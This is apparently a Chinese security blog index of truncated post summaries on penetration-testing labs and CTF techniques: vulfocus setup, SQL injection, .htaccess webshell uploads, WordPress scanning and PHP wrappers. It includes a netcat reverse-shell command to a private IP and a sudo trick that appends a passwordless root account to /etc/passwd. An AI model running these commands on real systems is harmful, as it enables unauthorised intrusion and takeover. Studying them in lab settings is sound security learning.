摘要:
首先我们用到了 vulfocus靶场 我们需要在docker环境下复现 1.docker search vulfocus 2.docker pull vulfocus/vulfocus 我们下载第一个 这个样子就算成功了 3.docker images 查看镜像 4.docker run -d -p 阅读全文
摘要:
众所周知 某些内网是无法在外网通过IP进行访问的 但是这时候有一种Host碰撞方法 他是收集外网的域名和IP 然后在本机 把外网的IP和内网的域名进行绑定 做成反向代理 我们便可以通过内网域名进到内网 获取到 内网的 东西。 阅读全文
摘要:
文件上传我们主要目的就是获取webshell,所以说如果能上传一个php的木马,并且可以解析,则说明我们可以拿到webshell,寻找我们需要的东西 上传文件,发现禁止上传 同时提示.htaccess文件,此文件是apache下面的 它可以把1.png解析成php文件并解析(此处png jpg都可以 阅读全文
摘要:
我们首先发现是一个sql注入,注入点在id 然后判断是字符型还是数字型 ?id=1 and 1=1 无变化 ?id=1 and 1=2 网页有变化,说明是数字型 接下来需要知道有几列,使用order by 进行查询,发现当为3时网页正常,说明有三列 下来看是否有回显,有回显,则可以使用联合查询(un 阅读全文
摘要:
1.sudo提权 通过命令sudo -l查看是否有可提权的命令。 teehee teehee --help 发现-a参数 可以追加 那麽我们选择给/etc/passwd 追加我们自己定义的用户名 echo 'admin::0:0::/home/admin:/bin/bash' |sudo teehe 阅读全文
摘要:
1.python python -c 'import pty;pty.spawn("/bin/bash")' 2.nc nc -e /bin/bash 192.168.41.123 789 阅读全文
摘要:
wordpress: 碰到wordpress 框架的 使用 kalilinux 里面的wpscan进行扫描 cewl kali自带的密码生成工具 也可以使用WPforce 工具 python2 yertle.py -u admin -p admin http://192.168.182.130/wo 阅读全文
摘要:
摘抄于:https://segmentfault.com/a/1190000018991087 file:// 协议 条件: allow_url_fopen:off/on allow_url_include :off/on 作用:用于访问本地文件系统,在CTF中通常用来读取本地文件的且不受allow 阅读全文
摘要:
我是用docker下的mysql搭建的wordpress,也可以用外部的mysql搭建 首先先拉两个镜像 docker pull wordpress docker pull mysql **配置mysql** docker run --name mysql -e MYSQL_ROOT_PASSWOR 阅读全文
摘要:
一.ceil函数 向上舍入为最近的整数 二.foreach 阅读全文